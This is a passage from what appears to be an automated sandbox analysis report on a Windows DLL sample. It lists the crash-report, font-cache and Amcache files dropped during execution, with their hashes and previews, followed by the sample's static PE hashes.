                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.678619951881378
                        Encrypted:false
                        SSDEEP:96:gVF6qdpSZqyty9hk1Dg3fWpXIQcQxc6VcEzcw3VR+a+z+HbHg0VG4rmMOyWZAXGp:oQ7B9HPRZvjIq/u7slS274ItW
                        MD5:2314D313E55933A1C818394150FC79E4
                        SHA1:D3136EB940E73470078AB3BCACA65B5BD880CFD9
                        SHA-256:98A940EC0D96CE6C7AFED935B3F6328FA74809CCE0A5E065C8B346AF5C627809
                        SHA-512:9A4C52AB66D4694A98F44DFFBFF83628167420BD2953706A0D470F44C46C3153F48421ED450EA7CC52F81B104A6B5761C705154179D8F20D280841916AA74269
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.4.1.0.0.4.5.5.2.3.0.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.4.1.0.1.0.5.9.9.1.4.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.5.2.4.9.6.3.-.5.0.8.6.-.4.3.7.8.-.a.a.d.e.-.5.0.7.c.3.c.c.a.5.5.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.e.a.6.7.3.e.-.a.d.3.c.-.4.1.4.a.-.b.6.c.1.-.5.3.5.d.6.4.4.2.1.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.0.-.0.0.0.1.-.0.0.1.7.-.9.a.0.6.-.b.3.a.e.a.4.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER581.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 17:50:05 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):1059068
                        Entropy (8bit):1.3679296955934206
                        Encrypted:false
                        SSDEEP:1536:dILzfDvWSJtpmlrUHpOAzih5uVCPAtJdKo5X37kK5xTmnRGe72Ut1yQB:dqrp2rUHp4hoVCI77DmR/2Ut8QB
                        MD5:2B3BB1E73F5417CBBA94BAB5F9A23BE0
                        SHA1:8989F49B15E937D37902F99BE2D5F66DD8BF16FF
                        SHA-256:28B33D4BC476E6C48894EA4319D920D6FAB817FB200950E82BD8A335D30C4B38
                        SHA-512:A5940083CD8666F0929A2DF36148FAA949C3E9515236F5A9356A1DAC88E15ABBBF9E136DDE15E5CB86F958A26E799745A07BBB8F98435A54EF0C7DAF851836B2
                        Malicious:false
                        Preview: MDMP....... .......M..a............4...............H.......$...........................`.......8...........T...........@................................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A6E.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49808
                        Entropy (8bit):3.07751871746348
                        Encrypted:false
                        SSDEEP:1536:DuHSxfEFmVPNlZAHxHULSmK5GIZ4y9Tjt7:DuHSxfEFmVPNlZAHxHULSmK5GU4y9TjJ
                        MD5:F995B8EA53E910527A1E58DA26B8284A
                        SHA1:3CB5A70A02ACE3EFA7BC1D70EA3E3E2B3E1EA470
                        SHA-256:E2AFA4CA5DFF1D395E8D79430BE0C470BEEA612038C2C46EA1D5D1229BEE2E85
                        SHA-512:ABEB857B348000653131BC1ECC6265B53580437DA6C707A2DECACB02D862FD24B2B0BAB9130BF0A4C32B2EB81D1CB169A63A17F26B81EC3086AFD919B303F16B
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E86.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6957528855021784
                        Encrypted:false
                        SSDEEP:96:9GiZYWG0RCqDYGYU9WgH5YEZYytriFFF+yww0GsKY+ar+JVA3zIPN3:9jZDGQRStLBar+JVAsPN3
                        MD5:AA12A49C17735F575F9DE21252764DD4
                        SHA1:CC9A6030CAE13BF2C329A62F31AAE3AD4A0B4B52
                        SHA-256:34E73D5BD3E9374D110BEBB17FD76F1765FFF38F0436A0296F3F5DD8FC83C7BC
                        SHA-512:30F9766C5B52315532B11F453BF7246228B0A182726913959ED68815B6F9011363AC5FD5688D6955955D95E7F1A43A8A1EF6B89BD2B121121B1079516D5026F5
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C9E.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49396
                        Entropy (8bit):3.078326445297238
                        Encrypted:false
                        SSDEEP:1536:FHHXB0lKQAoKQl/A8vmR/KLRKZZyaTvVza:FHHXB0lKQAoKQl/A8vmR/KLRyZyaTvVe
                        MD5:FD378F80D58B8AAD5C6F5E84D1F2DFAF
                        SHA1:B56A8068AD34286D1F1215CBDE79712C24E1D61F
                        SHA-256:8B9F7F03D85C396CE636EB03979233641431E06BE003AD1AE5DF0283BDB133C6
                        SHA-512:5F4E95869BE4D3C486600EBCE62035BE11AC4F9DFEE97A56D010841E5B5402EF4D88A47869F46DD92DBFEC89107BD73D785319D32F1E4B2182F2A53C61F06924
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA058.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6964294121392984
                        Encrypted:false
                        SSDEEP:96:9GiZYWTL0Yje6Y6YosW2uH3QYEZ9SetrilFL+7wpTBGOLa4LLEO38I6h3:9jZDfu6tWSBoSa4LLEOr6h3
                        MD5:F69960077705207D0A27B349E85CFFA3
                        SHA1:BFB7F1A8F40A243569D3F6443E29ABC42398790F
                        SHA-256:BE84D114B0306040AA411393E07A0267AEFAC81126EA2F8D17E22816BE964E00
                        SHA-512:58DD60608487332D74A69C08E8FF47F3415EFFB0719874B03E52E15D8637DE5095004179FC55C29798727E9034BC23FC3EBD03464C69D07E4C9659E7B2BEAB80
                        Malicious:false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD24.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8300
                        Entropy (8bit):3.6932020895656654
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNipE6G6YJxSUqlkgmfL8GSICpD589bXmsfC9m:RrlsNiK6G6YvSUukgmfLrSeXFfB
                        MD5:AE14C04A846BA9F8E1A399D339973C09
                        SHA1:C4AF4168EA0A92659C8AB476A2AC61D27F5B3383
                        SHA-256:85A4D174D37F8F1FD6087BBAD159C3033B63ED686EFFE5EFB3979005CF101985
                        SHA-512:7E589FB4B8476C667DEE5BFC9625EB22B86D5AC9DD7A82874F80B8944DF49D89305E5209F5FB12EB77EBD7210EA76AB11A391D7EC5232315A9A565984F2CD493
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.4.4.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE74B.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 17:49:57 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):26052
                        Entropy (8bit):2.557444551215252
                        Encrypted:false
                        SSDEEP:192:O0MutBHlO1YHOeR/cxmlCKCxKhe3Sa7NQ+ebAoIef7:C2BFZueaMlCKCxKY3SgNQ+uR
                        MD5:313E5A54D53DE9B03EA81A0DC6C74362
                        SHA1:226871018B652C200572A17376C02D68140F3D8F
                        SHA-256:7A358BAFF2720D68857BBDABFCBF8D5375E8BF2108F8B286C3875FD07C2F32BC
                        SHA-512:6C82D6EE04F562E25E979082723EA220DF18D5CF64A8FD64B08FAF168B31961B613D2328773A6166573859248607F47FD8A6006632EA68BDA84B529DF70DEAAC
                        Malicious:false
                        Preview: MDMP....... .......E..a............4...............H.......$...........................`.......8...........T...........h...\Y...........................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAC7.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8340
                        Entropy (8bit):3.702994961193325
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNip269F6YJ1SUH2wgmfzSzDCpBT89b8msfk0m:RrlsNio6v6Y7SUWwgmfzSz98Ffu
                        MD5:94E36D19C7B1AE8116E13D87D0BFA46C
                        SHA1:CF3550788F302BA4168344F47860F3BDEAA8C889
                        SHA-256:7073CE4D5B84FF2971A510C01AF94BE96330772E25CC6332A85049F99EDD9E43
                        SHA-512:FA1156B10F425670F64477585ECAB84E9A4DDFF7D3EA465C534425AB51242A3270191B6F6F611EC8AA4A2616C5FDED8A74DC5397E8854173B8292A0A39314B5C
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.4.4.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDB6.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.474652743364087
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsiJgtWI98HSWSC8BR8fm8M4J2ygZFqz+q84WU00KcQIcQwQhdd:uITfw3TSNAJ22znDKkwQhdd
                        MD5:D8D4EAEA78C61107B59A2731E1EE8DD5
                        SHA1:4EAA41A60968B9446ADA7C564928A740EA0518BC
                        SHA-256:5909AF7589AE7395E8554A2BD08C7EC7BA3FB7CF47F6DBC0E529EB689976C1DB
                        SHA-512:CFDA51D901B98EB7A2A42C92E066D57EB818EB7B13AF5F0A856B300CE314B856EE87F4922DBC37C1C73E8412332612166928451DB67B4F0C731B09A338C23672
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1280340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA5.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4558
                        Entropy (8bit):4.428374721600115
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsiJgtWI98HSWSC8Bv8fm8M4J2yGtF13+q84tjY0KcQIcQwQhdd:uITfw3TSNOJElx/KkwQhdd
                        MD5:C912B85A3294A83B66C998EAEF5693A0
                        SHA1:3C0C3D52C71CF8E552B6BBC76CEE9F29B024B851
                        SHA-256:AAD01C9659E9AD7DF5FC5C7CF0B64D8F968DEA6AA2751CD19A45EC580D2119F1
                        SHA-512:7A4B84231764DC7EFDA9FFE31B4DC74B28A8D05722509A0DAEDBED7D2FD0A972ABFE50B43D4CAA41A3B081ACEC819D648D9D9CF5F0031E8D6789FB7DB6C190C2
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1280340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Process:C:\Windows\System32\svchost.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):55
                        Entropy (8bit):4.306461250274409
                        Encrypted:false
                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                        Malicious:false
                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                        C:\Windows\appcompat\Programs\Amcache.hve
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.215262851555234
                        Encrypted:false
                        SSDEEP:12288:fMHzwKQAANrn2YHLBqf4xZfjaISv7xwJioCNkiA5NazzSllYdILIw6:UHzwKQAANr2YHL9CEi/+
                        MD5:8E4C33C4642BF7E0D2C0E86932998446
                        SHA1:B8759064BC4BFE3972DD22F341907C32DF19CF23
                        SHA-256:6B7B0DB45FCBA932A140E79DA8EEDF54A2DEDF9014B318E4637354B6579BE839
                        SHA-512:2E3AE18E24E3906DF07657D3BEEBD27F355B3137F376294E78EE9E6FA0AF621649045027B93A36E68C28BF5D1BB3BACB553523B53D9FBE399B39311834E34261
                        Malicious:false
                        Preview: regfW...W...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..D...................................................................................................................................................................................................................................................................................................................................................@Y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):2.8943954365148468
                        Encrypted:false
                        SSDEEP:192:kXU1SQpUxo8Y85FSETpq/bDIpn8h8K1ZV6nGoak:or5dAIpn88KTVgGVk
                        MD5:F4C44BE066D026642C5F33588EA97DF9
                        SHA1:A19D74170090798C8E753ABC9C47926ABDB8CAD5
                        SHA-256:3F9D6E489C50FC1A73184DE11C8ACFBF04080A640B678D5943332021D74F4061
                        SHA-512:8D8AC751389A229ADC649226B2F812B91C63E34360D93FE51FC338178C97A1CDA04BA0118CB29ABFDB69857AFCDF0A20CCF31B67DA58BEE2A00CAD633533999D
                        Malicious:false
                        Preview: regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..D...................................................................................................................................................................................................................................................................................................................................................@YHvLE.>......V............g...C....F..0_..................p......hbin................p.\..,..........nk,.RLG..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .RLG......... ........................... .......Z.......................Root........lf......Root....nk .RLG......................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.067331172246508
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:3pO1282Kpx.dll
                        File size:372736
                        MD5:173345845a2a7d0d99c17bdc5445df90
                        SHA1:35ed97b5ac5a3ed0fdc00eabff20f3bfcdfc8a7c
                        SHA256:9ed58848f0a7b354a32d4ef67ea9ff70ba75f9238c39d9f1af88fae6811cb504
                        SHA512:c67f4a25b4538ea45291636f4eb1c845bbe5ab68ae3297132f2e4bbde7f941a11eb276d5bdebe8179f412fd2e63a5346d53890c1e6aeacca88c7a84bde35bda4
                        SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyt6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLQRQKqV4epRmxAvAD
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

